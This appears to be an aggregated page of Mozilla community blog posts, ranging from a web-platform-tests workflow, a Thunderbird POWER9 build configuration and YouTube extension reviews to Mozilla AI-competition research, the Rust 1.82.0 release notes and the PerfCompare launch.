Picture of Mozilla L10n folks at the first Mozilla Summit (Whistler, 2008), back when Mozilla was still inviting volunteers to Company events. Mozilla L10n Community in Whistler, 2008 (Photo by Tristan Nitot).

Anne van KesterenWebKit and web-platform-tests

Let me state upfront that this strategy of keeping WebKit synchronized with parts of web-platform-tests has worked quite well for me, but I’m not at all an expert in this area so you might want to take advice from someone else.

Once I've identified what tests will be impacted by my changes to WebKit, including what additional coverage might be needed, I create a branch in my local web-platform-tests checkout to make the necessary changes to increase coverage. I try to be a little careful here so it'll result in a nice pull request against web-platform-tests later. I’ve been a web-platform-tests contributor quite a while longer than I’ve been a WebKit contributor so perhaps it’s not surprising that my approach to test development starts with web-platform-tests.

I then run import-w3c-tests web-platform-tests/[testsDir] -s [wptParentDir] on the WebKit side to ensure it has the latest tests, including any changes I made. And then I usually run them and revise, as needed.

This has worked surprisingly well for a number of changes I’ve made to date and hasn’t let me down. Two things to be mindful of:

  • On macOS, don’t put development work, especially WebKit, inside ~/Documents. You might not have a good time.
  • [wptParentDir] above needs to contain a directory named web-platform-tests, not wpt. This is annoyingly different from the default you get when cloning web-platform-tests (the repository was renamed to wpt at some point). Perhaps something to address in import-w3c-tests.

Chris H-CNine-Year Moziversary

On this day (or near it) in 2015, I joined the Mozilla project by starting work as a full-time employee of Mozilla Corporation. I’m two hardware refreshes in (I was bad about doing them on time, leaving my 2017 refresh until 2018 and my 2020 refresh until 2022! (though, admittedly, the 2020 refresh was actually pushed to the end of 2021 by a policy change in early 2020 moving from 2-year to 3-year refreshes)) and facing a third in February. Organizationally, I’m three CEOs and sixty reorgs in.

I’m still working on Data, same as last year. And I’m still trying to move Firefox Desktop to use solely Glean for its data collection system. Some of my predictions from last year’s moziversary post came true: I continued working on client code in Firefox Desktop, I hardly blogged at all, we continue to support collections in all of Legacy Telemetry’s systems (though we’ve excitingly just removed some big APIs), Glean has continued to gain ground in Firefox Desktop (we’re up to 4134 metrics at time of writing), “FOG Migration” has continued to not happen (I suppose it was one missed prediction that top-down guidance would change — it hasn’t, but interpretations of it sure have), and I’m publishing this moziversary blog post a little ahead of my moziversary instead of after it.

My biggest missed prediction was “We will quietly stop talking about AI so much, in the same way most firms have stopped talking about Web3 this year”. Mozilla, both Corporation and Foundation, seem unable to stop talking about AI (a phrase here meaning “large generative models built on extractive data mining which use chatbot UI”). Which, I mean, fair: it’s consuming basically all the oxygen and money in the industry at the moment. We have to have a position on it, and it’s appropriating “Open” language that Mozilla has a vested interest in protecting (though you’d be excused for forgetting that given how little we’ve tried to work with the FSF and assorted other orgs trying to shepherd the ideas and values of Open Source in the recent past). But we’ve for some reason been building products around these chatbots without interrogating whether that’s a good thing.

And you’d think with all our worry about what a definition of Open Source might mean, we’d make certain to only release products that are Open Source. But no.

I understand why we’re diving into products and trying to release innovative things in product shape… but Mozilla is famously terrible at building products. We’re okay at building services (I’m a fan of both Monitor and Relay). But where we seem to truly excel is in building platforms and infrastructure.

We build Firefox, the only independent browser, a train that runs on the rails of the Web. We build Common Voice, a community and platform for getting underserved languages (where which languages are used is determined by the community) the support they need. We built Rust, a memory-safe systems language that is now succeeding without Mozilla’s help. We built Hubs, a platform for bringing people together in virtual space with nothing but a web browser.

We’re just so much better at platforms and infrastructure. Why we don’t lean more into that, I don’t know.

Well, I _do_ know. Or I can guess. Our golden goose might be cooked.

How can Mozilla make money if our search deal becomes illegal? Maintaining a browser is expensive. Hosting services is expensive. Keeping the tech giants on their toes and compelling them to be better is expensive. We need money, and we’ve learned that there is no world where donations will be enough to fund even just the necessary work let alone any innovations we might try.

How do you monetize a platform? How do you monetize infrastructure?

Governments do it through taxation and funding. But Mozilla Corporation isn’t a government agency. It’s a conventional Silicon Valley private capital corporation (its relationship to Mozilla Foundation is unconventional, true, but I argue that’s irrelevant to how MoCo organizes itself these days). And the only process by which Silicon Valley seems to understand how to extract money to pay off their venture capitalists is products and consumers.

Now, Mozilla Corporation doesn’t have venture capital. You can read in the State of Mozilla that we operate at a profit each and every year with net assets valued at over a billion USD. But the environment in which MoCo operates — the place from which we hire our C-Suite, the place where the people writing the checks live — is saturated in venture capital and the ways of thinking it encourages.

This means Mozilla Corporation acts like its Bay Area peers, even though it’s special. Even though it doesn’t have to.

This means it does layoffs even when it doesn’t need to. Even when there’s no shareholders or fund managers to impress.

This means it increasingly speaks in terms of products and customers instead of projects and users.

This means it quickly loses sight of anything specifically Mozilla-ish about Mozilla (like the community that underpins specific systems crucial to us continuing to exist (support and l10n for two examples) as well as the general systems of word-of-mouth and keeping Mozilla and Firefox relevant enough that tech press keep writing about us and grandpas keep installing us) because it doesn’t fit the patterns of thought that developed while directing leveraged capital.

(( Which I don’t like, if my tone isn’t coming across clearly enough for you to have guessed. ))

Okay, that’s more than enough editorial for a Moziversary post. Let’s get to the predictions for the next year:

  • I still won’t blog as much as I’d like,
  • “FOG Migration” might actually happen! We’ve finally managed to convince Firefox folks just how great Glean is and they might actually commit official resources! I predict that we’re still sending Legacy Telemetry by the end of next year, but only bits and pieces. A weak shadow of what we send today.
  • There’ll be an All Hands, but depending on the result of the US federal election in November I might not attend because its location has been announced as Washington DC and I don’t know if the United States will be in a state next year to be trusted to keep me safe,
  • We will stop putting AI in everything and hoping to accidentally make a product that’ll somehow make money, and instead focus on finding problems Mozilla can solve and only then interrogating whether AI will help,
  • The search for the new CEO will not have completed by next October, so I’ll still be three CEOs in, instead of four,
  • I will execute on my hardware refresh on time this February, and maybe also get a new monitor so I’m not using my personal one for work.

Let’s see how it goes! Til next time.

:chutten

The Talospace ProjectRunning Thunderbird with the OpenPower Baseline JIT

The issues with Ion and Wasm in OpenPower Firefox notwithstanding, the Baseline JIT works well in Firefox ESR128, and many of you use it (including yours truly). Of course, that makes Thunderbird look sluggish without it.

I haven't been able to get a full LTO-PGO build of Thunderbird to work properly so far with gcc (workin' on it), but with the JIT patches for ESR128 an LTO-optimized build will complete and run, and that's good enough for now. The diff for the .mozconfig is more or less the following:

export CC=/usr/bin/gcc
export CXX=/usr/bin/g++

mk_add_options MOZ_MAKE_FLAGS="-j24"

#ac_add_options --enable-application=browser
#ac_add_options MOZ_PGO=1
#
ac_add_options --enable-project=comm/mail
mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/tbobj

ac_add_options --enable-optimize="-O3 -mcpu=power9 -fpermissive"
ac_add_options --enable-release
ac_add_options --enable-linker=bfd
ac_add_options --enable-lto=full
ac_add_options --without-wasm-sandboxed-libraries
ac_add_options --with-libclang-path=/usr/lib64

export GN=/home/censored/bin/gn # if you haz
export RUSTC_OPT_LEVEL=2

You can use a unified .mozconfig like this to handle both the browser and the E-mail client; if you do, then to build the browser, uncomment the commented lines and comment out the two lines immediately below that commented section.

You'll need comm-central embedded in your ESR128 tree as per the build instructions, and you may want to create an .hg/hgignore file inside your ESR128 source directory as well to keep changes to the core and Tbird from clashing, something like

^tbobj/
^comm/

which will ignore those directories but isn't a change to .hgignore that you have to manually edit out. Once constructed, your built client will be in tbobj/. If you were using a prebuilt Thunderbird before, you may need to start it with tbobj/dist/bin/thunderbird -p default-release (substitute your profile name if it differs) to make sure you get your old mailbox back, though as always, back up your profile first.

Firefox Add-on ReviewsYouTube your way — browser extensions put you in charge of your video experience

YouTube wants you to experience YouTube in very prescribed ways. But with the right browser extension, you’re free to alter YouTube to taste. Change the way the site looks, behaves, and delivers your favorite videos. 

Enhancer for YouTube

With dozens of customization features, Enhancer for YouTube has the power to dramatically reorient the way you watch videos. 

While a bunch of customization options may seem overwhelming, Enhancer for YouTube actually makes it very simple to navigate its settings and select just your favorite features. You can even choose which of your preferred features will display in the extension’s easy access interface that appears just beneath the video player.

Enhancer for YouTube offers easy access controls just beneath the video player.

Key features… 

  • Customize video player size 
  • Change YouTube’s look with a dark theme
  • Volume booster
  • Ad blocking (with ability to whitelist channels you OK for ads)
  • Take quick screenshots of videos
  • Change playback speed
  • Set default video quality from low to high def
  • Shortcut configuration

Return YouTube Dislike

Do you like the Dislike? YouTube removed the display that revealed the number of thumbs-down Dislikes a video has, but with Return YouTube Dislike you can bring back the brutal truth. 

“Does exactly what the name suggests. Can’t see myself without this extension. Seriously, bad move on YouTube for removing such a vital tool.”

Firefox user OFG

“i have never smashed 5 stars faster.”

Firefox user 12918016

YouTube High Definition

Though its primary function is to automatically play all YouTube videos in their highest possible resolution, YouTube High Definition has a few other fine features to offer. 

In addition to automatic HD, YouTube High Definition can…

  • Customize video player size
  • Support HD for clips embedded on external sites
  • Specify your ideal resolution (4k – 144p)
  • Set a preferred volume level
  • Automatically play the highest quality audio

YouTube NonStop

So simple. So awesome. YouTube NonStop remedies the headache of interrupting your music with that awful “Video paused. Continue watching?” message. 

Works on YouTube and YouTube Music. You’re now free to navigate away from your YouTube tab for as long as you like and not fret that the rock will stop rolling. 

Unhook: Remove YouTube Recommended Videos & Comments

Instant serenity for YouTube! Unhook lets you strip away unwanted distractions like the promotional sidebar, endscreen suggestions, trending tab, and much more. 

More than two dozen customization options make this an essential extension for anyone seeking escape from YouTube rabbit holes. You can even hide notifications and live chat boxes. 

“This is the best extension to control YouTube usage, and not let YouTube control you.”

Firefox user Shubham Mandiya

PocketTube

If you subscribe to a lot of YouTube channels PocketTube is a fantastic way to organize all your subscriptions by themed collections. 

Group your channel collections by subject, like “Sports,” “Cooking,” “Cat videos” or whatever. Other key features include…

  • Add custom icons to easily identify your channel collections
  • Customize your feed so you just see videos you haven’t watched yet, prioritize videos from certain channels, plus other content settings
  • Integrates seamlessly with YouTube homepage 
  • Sync collections across Firefox/Android/iOS using Google Drive and Chrome Profiler
PocketTube keeps your channel collections neatly tucked away to the side.

AdBlocker for YouTube

It’s not just you who’s noticed a lot more ads lately. Regain control with AdBlocker for YouTube.

The extension very simply and effectively removes both video and display ads from YouTube. Period. Enjoy a faster, more focused YouTube. 

SponsorBlock

It’s a terrible experience when you’re enjoying a video or music on YouTube and you’re suddenly interrupted by a blaring ad. SponsorBlock solves this problem in a highly effective and original way. 

Leveraging the power of crowdsourced information to locate precisely where interruptive sponsored segments appear in videos, SponsorBlock learns where to automatically skip those segments with its ever-growing database of videos. You can also participate in the project by reporting sponsored segments whenever you encounter them (it’s easy to report right there on the video page with the extension).

SponsorBlock can also learn to skip the non-music portions of music videos, as well as intros and outros. If you’d like a deeper dive into SponsorBlock, we profiled its developer and open source project on Mozilla Distilled.

We hope one of these extensions enhances the way you enjoy YouTube. Feel free to explore more great media extensions on addons.mozilla.org.

 

Firefox Add-on ReviewsHow to turn your household pet into a Firefox theme

Themes are a fun way to change the visual appearance of Firefox and give the browser a look that’s all your own. You’re free to explore more than a half-million community created themes on addons.mozilla.org (AMO), or better yet, create your own custom theme. Best of all — create a theme featuring a beloved pet! Then you can take your little buddy with you wherever you go on the web. 

(You’ll need a Mozilla account to create and publish Firefox themes on AMO.)

Prepare your pet pic for upload

I find it helpful to first size my image properly. For Firefox themes, we recommend images with a height between 100 – 200 pixels. So I might first prepare an image with a couple of sizing options, perhaps one at 100 pixel height and another at 200, and see what works best. (Note: as you resize an image, be sure its height and width parameters change in sync so your image maintains proper dimensions.)

Tootsie strikes a pose to become a Firefox theme.

Depending on what type of image editing software you have on your computer (PC users can resize pics with the standard Photo or Paint apps, while Mac users may be familiar with Preview), find the controls to resize and save your images in the recommended range. Supported file formats include PNG, JPG, APNG, SVG, or GIF (not animated) and can be up to 6.9MB. 

Upload your pet pic & select custom colors

Go to AMO’s Theme Generator page and…

  • Name your theme
  • Upload your image
  • Select colors for the header background, text and icons
Point-and-click color palettes make it easy to create complementary color combinations.

Once you like the way your new theme looks in the preview display, click Finish Theme and you’re done! All new theme submissions must first pass a review process, but that usually only takes a day or two, after which you’ll receive an email notifying you that your personalized pet theme is ready to install on Firefox. Now Tootsie accompanies me everywhere online, although sometimes she just stares at me. 

For more tips on creating Firefox themes, please see this Theme Generator guide or visit the Extension Workshop.

The Mozilla BlogMozilla’s research: Unlocking AI for everyone, not just Big Tech

Artificial intelligence (AI) is shaping how we live, work and connect with the world. From chatbots to image generators, AI is transforming our online experiences. But this change raises serious questions: Who controls the technology behind these AI systems? And how can we ensure that everyone — not just traditional big tech — has a fair shot at accessing and contributing to this powerful tool?

To explore these crucial issues, Mozilla commissioned two pieces of research that dive deep into the challenges around AI access and competition: “External Researcher Access to Closed Foundation Models” (commissioned from data rights agency AWO) and “Stopping Big Tech From Becoming Big AI” (commissioned from the Open Markets Institute). These reports show how AI is being built, who’s in control and what changes need to happen to ensure a fair and open AI ecosystem.

Why researcher access matters

“External Researcher Access to Closed Foundation Models” (authored by Esme Harrington and Dr. Mathias Vermeulen from AWO) addresses a pressing issue: independent researchers need better conditions for accessing and studying the AI models that big companies have developed. Foundation models — the core technology behind many AI applications — are controlled mainly by a few major players who decide who can study or use them.

What’s the problem with access?

  • Limited access: Companies like OpenAI, Google and others are the gatekeepers. They often restrict access to researchers whose work aligns with their priorities, which means independent, public-interest research can be left out in the cold.
  • High-end costs: Even when access is granted, it often comes with a hefty price tag that smaller or less-funded teams can’t afford.
  • Lack of transparency: These companies don’t always share how their models are updated or moderated, making it nearly impossible for researchers to replicate studies or fully understand the technology.
  • Legal risks: When researchers try to scrutinize these models, they sometimes face legal threats if their work uncovers flaws or vulnerabilities in the AI systems.

The research suggests that companies need to offer more affordable and transparent access to improve AI research. Additionally, governments should provide legal protections for researchers, especially when they are acting in the public interest by investigating potential risks.

A glowing network pyramid with nodes connected by lines, emerging from an illuminated web beneath the surface, symbolizing interconnected communication and data flow.

External researcher access to closed foundation models

Read the paper

AI competition: Is big tech stifling innovation?

The second piece of research (authored by Max von Thun and Daniel Hanley from the Open Markets Institute) takes a closer look at the competitive landscape of AI. Right now, a few tech giants like Microsoft, Google, Amazon, Meta and Apple are building expansive ecosystems which set them up to dominate various parts of the AI value chain. And a handful of companies control most of the key resources needed to develop advanced AI, including computing power, data and cloud infrastructure. The result? Smaller companies and independent innovators are being squeezed out of the race from the start.

What’s happening in the AI market?

  • Market concentration: A small number of companies have a stranglehold on key inputs and distribution in AI. They control the data, computing power and infrastructure everyone else needs to develop AI.
  • Anticompetitive tie-ups: These big players buy up, or do deals with, smaller AI startups in ways that often evade traditional competition controls. This can stop these smaller companies from challenging big tech and prevents others from competing on an even playing field.
  • Gatekeeper power: Big Tech’s control over essential infrastructure — like cloud services and app stores — allows them to set unfair terms for smaller competitors. They can charge higher fees or prioritize their products over others.

The research calls for strong action from governments and regulators to avoid recreating the same market concentration we have seen in digital markets over the past 20 years. It’s about creating a level playing field where smaller companies can compete, innovate and offer consumers more choices. This means enforcing rules to prevent tech giants from using their platforms to give their AI products an unfair advantage. It also means ensuring that critical resources like computing power and data are more accessible to everyone, not just big tech.

A futuristic chessboard with blue and purple tones, featuring connected glowing lines between pieces, including a queen, pawns, a knight, and a rook, suggesting a network or strategy concept.

Stopping Big Tech From Becoming Big AI

Read the paper

Why this matters

AI has the potential to bring significant benefits to society, but only if it’s developed in a way that’s open, fair and accountable. Mozilla believes that a few powerful corporations shouldn’t determine the future of AI. Instead, we need a diverse and vibrant ecosystem where public-interest research thrives and competition drives innovation and choice – including from open source, public, non-profit and private actors.

The findings emphasize the need for change. Improving access to foundation models for researchers and addressing the growing concentration of power in AI can help ensure that AI develops in ways that benefit all of us — not just the tech giants.

Mozilla is committed to advocating for a more transparent and competitive AI landscape; this research is an essential step toward making that vision a reality. 

The post Mozilla’s research: Unlocking AI for everyone, not just Big Tech appeared first on The Mozilla Blog.

The Rust Programming Language BlogAnnouncing Rust 1.82.0

The Rust team is happy to announce a new version of Rust, 1.82.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.82.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.82.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.82.0 stable

cargo info

Cargo now has an info subcommand to display information about a package in the registry, fulfilling a long standing request just shy of its tenth anniversary! Several third-party extensions like this have been written over the years, and this implementation was developed as cargo-information before merging into Cargo itself.

For example, here's what you could see for cargo info cc:

cc #build-dependencies
A build-time dependency for Cargo build scripts to assist in invoking the native
C compiler to compile native C code into a static archive to be linked into Rust
code.
version: 1.1.23 (latest 1.1.30)
license: MIT OR Apache-2.0
rust-version: 1.63
documentation: https://docs.rs/cc
homepage: https://github.com/rust-lang/cc-rs
repository: https://github.com/rust-lang/cc-rs
crates.io: https://crates.io/crates/cc/1.1.23
features:
  jobserver = []
  parallel  = [dep:libc, dep:jobserver]
note: to see how you depend on cc, run `cargo tree --invert --package cc@1.1.23`

By default, cargo info describes the package version in the local Cargo.lock, if any. As you can see, it will indicate when there's a newer version too, and cargo info cc@1.1.30 would report on that.

Apple target promotions

macOS on 64-bit ARM is now Tier 1

The Rust target aarch64-apple-darwin for macOS on 64-bit ARM (M1-family or later Apple Silicon CPUs) is now a tier 1 target, indicating our highest guarantee of working properly. As the platform support page describes, every change in the Rust repository must pass full tests on every tier 1 target before it can be merged. This target was introduced as tier 2 back in Rust 1.49, making it available in rustup. This new milestone puts the aarch64-apple-darwin target on par with the 64-bit ARM Linux and the X86 macOS, Linux, and Windows targets.

Mac Catalyst targets are now Tier 2

Mac Catalyst is a technology by Apple that allows running iOS applications natively on the Mac. This is especially useful when testing iOS-specific code, as cargo test --target=aarch64-apple-ios-macabi --target=x86_64-apple-ios-macabi mostly just works (in contrast to the usual iOS targets, which need to be bundled using external tooling before they can be run on a native device or in the simulator).

The targets are now tier 2, and can be downloaded with rustup target add aarch64-apple-ios-macabi x86_64-apple-ios-macabi, so now is an excellent time to update your CI pipeline to test that your code also runs in iOS-like environments.

Precise capturing use<..> syntax

Rust now supports use<..> syntax within certain impl Trait bounds to control which generic lifetime parameters are captured.

Return-position impl Trait (RPIT) types in Rust capture certain generic parameters. Capturing a generic parameter allows that parameter to be used in the hidden type. That in turn affects borrow checking.

In Rust 2021 and earlier editions, lifetime parameters are not captured in opaque types on bare functions and on functions and methods of inherent impls unless those lifetime parameters are mentioned syntactically in the opaque type. E.g., this is an error:

//@ edition: 2021
fn f(x: &()) -> impl Sized { x }
error[E0700]: hidden type for `impl Sized` captures lifetime that does not appear in bounds
 --> src/main.rs:1:30
  |
1 | fn f(x: &()) -> impl Sized { x }
  |         ---     ----------   ^
  |         |       |
  |         |       opaque type defined here
  |         hidden type `&()` captures the anonymous lifetime defined here
  |
help: add a `use<...>` bound to explicitly capture `'_`
  |
1 | fn f(x: &()) -> impl Sized + use<'_> { x }
  |                            +++++++++

With the new use<..> syntax, we can fix this, as suggested in the error, by writing:

fn f(x: &()) -> impl Sized + use<'_> { x }

Previously, correctly fixing this class of error required defining a dummy trait, conventionally called Captures, and using it as follows:

trait Captures<T: ?Sized> {}
impl<T: ?Sized, U: ?Sized> Captures<T> for U {}

fn f(x: &()) -> impl Sized + Captures<&'_ ()> { x }

That was called "the Captures trick", and it was a bit baroque and subtle. It's no longer needed.

There was a less correct but more convenient way to fix this that was often used called "the outlives trick". The compiler even previously suggested doing this. That trick looked like this:

fn f(x: &()) -> impl Sized + '_ { x }

In this simple case, the trick is exactly equivalent to + use<'_> for subtle reasons explained in RFC 3498. However, in real life cases, this overconstrains the bounds on the returned opaque type, leading to problems. For example, consider this code, which is inspired by a real case in the Rust compiler:

struct Ctx<'cx>(&'cx u8);

fn f<'cx, 'a>(
    cx: Ctx<'cx>,
    x: &'a u8,
) -> impl Iterator<Item = &'a u8> + 'cx {
    core::iter::once_with(move || {
        eprintln!("LOG: {}", cx.0);
        x
    })
//~^ ERROR lifetime may not live long enough
}

We can't remove the + 'cx, since the lifetime is used in the hidden type and so must be captured. Neither can we add a bound of 'a: 'cx, since these lifetimes are not actually related and it won't in general be true that 'a outlives 'cx. If we write + use<'cx, 'a> instead, however, this will work and have the correct bounds.

There are some limitations to what we're stabilizing today. The use<..> syntax cannot currently appear within traits or within trait impls (but note that there, in-scope lifetime parameters are already captured by default), and it must list all in-scope generic type and const parameters. We hope to lift these restrictions over time.

Note that in Rust 2024, the examples above will "just work" without needing use<..> syntax (or any tricks). This is because in the new edition, opaque types will automatically capture all lifetime parameters in scope. This is a better default, and we've seen a lot of evidence about how this cleans up code. In Rust 2024, use<..> syntax will serve as an important way of opting-out of that default.

For more details about use<..> syntax, capturing, and how this applies to Rust 2024, see the "RPIT lifetime capture rules" chapter of the edition guide. For details about the overall direction, see our recent blog post, "Changes to impl Trait in Rust 2024".

Native syntax for creating a raw pointer

Unsafe code sometimes has to deal with pointers that may dangle, may be misaligned, or may not point to valid data. A common case where this comes up is repr(packed) structs. In such a case, it is important to avoid creating a reference, as that would cause undefined behavior. This means the usual & and &mut operators cannot be used, as those create a reference -- even if the reference is immediately cast to a raw pointer, it's too late to avoid the undefined behavior.

For several years, the macros std::ptr::addr_of! and std::ptr::addr_of_mut! have served this purpose. Now the time has come to provide a proper native syntax for this operation: addr_of!(expr) becomes &raw const expr, and addr_of_mut!(expr) becomes &raw mut expr. For example:

#[repr(packed)]
struct Packed {
    not_aligned_field: i32,
}

fn main() {
    let p = Packed { not_aligned_field: 1_82 };

    // This would be undefined behavior!
    // It is rejected by the compiler.
    //let ptr = &p.not_aligned_field as *const i32;

    // This is the old way of creating a pointer.
    let ptr = std::ptr::addr_of!(p.not_aligned_field);

    // This is the new way.
    let ptr = &raw const p.not_aligned_field;

    // Accessing the pointer has not changed.
    // Note that `val = *ptr` would be undefined behavior because
    // the pointer is not aligned!
    let val = unsafe { ptr.read_unaligned() };
}

The native syntax makes it more clear that the operand expression of these operators is interpreted as a place expression. It also avoids the term "address-of" when referring to the action of creating a pointer. A pointer is more than just an address, so Rust is moving away from terms like "address-of" that reaffirm a false equivalence of pointers and addresses.

Safe items with unsafe extern

Rust code can use functions and statics from foreign code. The type signatures of these foreign items are provided in extern blocks. Historically, all items within extern blocks have been unsafe to use, but we didn't have to write unsafe anywhere on the extern block itself.

However, if a signature within the extern block is incorrect, then using that item will result in undefined behavior. Would that be the fault of the person who wrote the extern block, or the person who used that item?

We've decided that it's the responsibility of the person writing the extern block to ensure that all signatures contained within it are correct, and so we now allow writing unsafe extern:

unsafe extern {
    pub safe static TAU: f64;
    pub safe fn sqrt(x: f64) -> f64;
    pub unsafe fn strlen(p: *const u8) -> usize;
}

One benefit of this is that items within an unsafe extern block can be marked as safe to use. In the above example, we can call sqrt or read TAU without using unsafe. Items that aren't marked with either safe or unsafe are conservatively assumed to be unsafe.

In future releases, we'll be encouraging the use of unsafe extern with lints. Starting in Rust 2024, using unsafe extern will be required.

For further details, see RFC 3484 and the "Unsafe extern blocks" chapter of the edition guide.

Unsafe attributes

Some Rust attributes, such as no_mangle, can be used to cause undefined behavior without any unsafe block. If this were regular code we would require them to be placed in an unsafe {} block, but so far attributes have not had comparable syntax. To reflect the fact that these attributes can undermine Rust's safety guarantees, they are now considered "unsafe" and should be written as follows:

#[unsafe(no_mangle)]
pub fn my_global_function() { }

The old form of the attribute (without unsafe) is currently still accepted, but might be linted against at some point in the future, and will be a hard error in Rust 2024.

This affects the following attributes:

  • no_mangle
  • link_section
  • export_name
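
For illustration only, here is a minimal sketch of the unsafe(...) form applied to the other two attributes in the list above; the section and symbol names are invented for the example:

// Illustrative sketch: the section and symbol names below are arbitrary.
#[unsafe(link_section = ".my_example_section")]
pub static FLAG: u8 = 0;

#[unsafe(export_name = "my_exported_symbol")]
pub fn exported() {}

fn main() {
    exported();
    assert_eq!(FLAG, 0);
}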

For further details, see the "Unsafe attributes" chapter of the edition guide.

Omitting empty types in pattern matching

Patterns which match empty (a.k.a. uninhabited) types by value can now be omitted:

use std::convert::Infallible;
pub fn unwrap_without_panic<T>(x: Result<T, Infallible>) -> T {
    let Ok(x) = x; // the `Err` case does not need to appear
    x
}

This works with empty types such as a variant-less enum Void {}, or structs and enums with a visible empty field and no #[non_exhaustive] attribute. It will also be particularly useful in combination with the never type !, although that type is still unstable at this time.

There are some cases where empty patterns must still be written. For reasons related to uninitialized values and unsafe code, omitting patterns is not allowed if the empty type is accessed through a reference, pointer, or union field:

pub fn unwrap_ref_without_panic<T>(x: &Result<T, Infallible>) -> &T {
    match x {
        Ok(x) => x,
        // this arm cannot be omitted because of the reference
        Err(infallible) => match *infallible {},
    }
}

To avoid interfering with crates that wish to support several Rust versions, match arms with empty patterns are not yet reported as “unreachable code” warnings, despite the fact that they can be removed.

Floating-point NaN semantics and const

Operations on floating-point values (of type f32 and f64) are famously subtle. One of the reasons for this is the existence of NaN ("not a number") values which are used to represent e.g. the result of 0.0 / 0.0. What makes NaN values subtle is that more than one possible NaN value exists. A NaN value has a sign (that can be checked with f.is_sign_positive()) and a payload (that can be extracted with f.to_bits()). However, both the sign and payload of NaN values are entirely ignored by == (which always returns false). Despite very successful efforts to standardize the behavior of floating-point operations across hardware architectures, the details of when a NaN is positive or negative and what its exact payload is differ across architectures. To make matters even more complicated, Rust and its LLVM backend apply optimizations to floating-point operations when the exact numeric result is guaranteed not to change, but those optimizations can change which NaN value is produced. For instance, f * 1.0 may be optimized to just f. However, if f is a NaN, this can change the exact bit pattern of the result!

With this release, Rust standardizes on a set of rules for how NaN values behave. This set of rules is not fully deterministic, which means that the result of operations like (0.0 / 0.0).is_sign_positive() can differ depending on the hardware architecture, optimization levels, and the surrounding code. Code that aims to be fully portable should avoid using to_bits and should use f.signum() == 1.0 instead of f.is_sign_positive(). However, the rules are carefully chosen to still allow advanced data representation techniques such as NaN boxing to be implemented in Rust code. For more details on what the exact rules are, check out our documentation.

With the semantics for NaN values settled, this release also permits the use of floating-point operations in const fn. Due to the reasons described above, operations like (0.0 / 0.0).is_sign_positive() (which will be const-stable in Rust 1.83) can produce a different result when executed at compile-time vs at run-time. This is not a bug, and code must not rely on a const fn always producing the exact same result.
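
As a small illustrative example (not taken from the release notes), ordinary floating-point arithmetic can now appear in const fn and in constant initializers:

// Illustrative sketch: float math in `const fn` is now allowed.
const fn fahrenheit_to_celsius(f: f64) -> f64 {
    (f - 32.0) * 5.0 / 9.0
}

const BOILING_POINT_C: f64 = fahrenheit_to_celsius(212.0);

fn main() {
    // The same function also works at run time; only NaN-producing
    // operations may differ between compile time and run time.
    assert_eq!(BOILING_POINT_C, 100.0);
}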

Constants as assembly immediates

The const assembly operand now provides a way to use integers as immediates without first storing them in a register. As an example, we implement a syscall to write by hand:

const WRITE_SYSCALL: c_int = 0x01; // syscall 1 is `write`
const STDOUT_HANDLE: c_int = 0x01; // `stdout` has file handle 1
const MSG: &str = "Hello, world!\n";

let written: usize;

// Signature: `ssize_t write(int fd, const void buf[], size_t count)`
unsafe {
    core::arch::asm!(
        "mov rax, {SYSCALL} // rax holds the syscall number",
        "mov rdi, {OUTPUT}  // rdi is `fd` (first argument)",
        "mov rdx, {LEN}     // rdx is `count` (third argument)",
        "syscall            // invoke the syscall",
        "mov {written}, rax // save the return value",
        SYSCALL = const WRITE_SYSCALL,
        OUTPUT = const STDOUT_HANDLE,
        LEN = const MSG.len(),
        in("rsi") MSG.as_ptr(), // rsi is `buf *` (second argument)
        written = out(reg) written,
    );
}

assert_eq!(written, MSG.len());

Output:

Hello, world!

Playground link.

In the above, a statement such as LEN = const MSG.len() populates the format specifier LEN with an immediate that takes the value of MSG.len(). This can be seen in the generated assembly (the value is 14):

lea     rsi, [rip + .L__unnamed_3]
mov     rax, 1    # rax holds the syscall number
mov     rdi, 1    # rdi is `fd` (first argument)
mov     rdx, 14   # rdx is `count` (third argument)
syscall # invoke the syscall
mov     rax, rax  # save the return value

See the reference for more details.

Safely addressing unsafe statics

This code is now allowed:

static mut STATIC_MUT: Type = Type::new();
extern "C" {
    static EXTERN_STATIC: Type;
}
fn main() {
     let static_mut_ptr = &raw mut STATIC_MUT;
     let extern_static_ptr = &raw const EXTERN_STATIC;
}

In an expression context, STATIC_MUT and EXTERN_STATIC are place expressions. Previously, the compiler's safety checks were not aware that the raw ref operator did not actually affect the operand's place, treating it as a possible read or write to a pointer. No unsafety is actually present, however, as it just creates a pointer.

Relaxing this may cause problems where some unsafe blocks are now reported as unused if you deny the unused_unsafe lint, but they are now only useful on older versions. Annotate these unsafe blocks with #[allow(unused_unsafe)] if you wish to support multiple versions of Rust, as in this example diff:

 static mut STATIC_MUT: Type = Type::new();
 fn main() {
+    #[allow(unused_unsafe)]
     let static_mut_ptr = unsafe { std::ptr::addr_of_mut!(STATIC_MUT) };
 }

A future version of Rust is expected to generalize this to other expressions which would be safe in this position, not just statics.

Stabilized APIs

These APIs are now stable in const contexts:

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.82.0

Many people came together to create Rust 1.82.0. We couldn't have done it without all of you. Thanks!

Mozilla Performance BlogAnnouncing PerfCompare: the new comparison tool !

About two years ago, I joined the performance test team to help build PerfCompare, an improved performance tool designed to replace Perfherder’s Compare View. Around that time, we introduced PerfCompare to garner enthusiasm and feedback as we created a new workflow that would reduce the cognitive load and confusion of its predecessor. And, if we’re being honest, we also wanted a tool that would be more enjoyable from a design perspective for comparing the results of performance tests. But most importantly, we wanted to add new, relevant features while keeping Firefox engineers foremost in mind.

PerfCompare's first home page

Started from the bottom… PerfCompare’s first home page

Now, after working with Senior Product Designer Dasha Andriyenko to create a sleek, intuitive UI/UX, integrating feedback from engineers and leaders across different teams, and achieving key milestones, we’re excited to announce that PerfCompare is live and ready to use at perf.compare.

PerfCompare's current home page

Now we’re on top! PerfCompare today!

Time to celebrate! 🎉

PerfCompare’s ultimate purpose is to become a tool that empowers developers to make performance testing a core part of their development process.

We are targeting the end of this year to deprecate Compare View and make PerfCompare the primary tool to help Firefox developers analyze the performance impact of their patches.

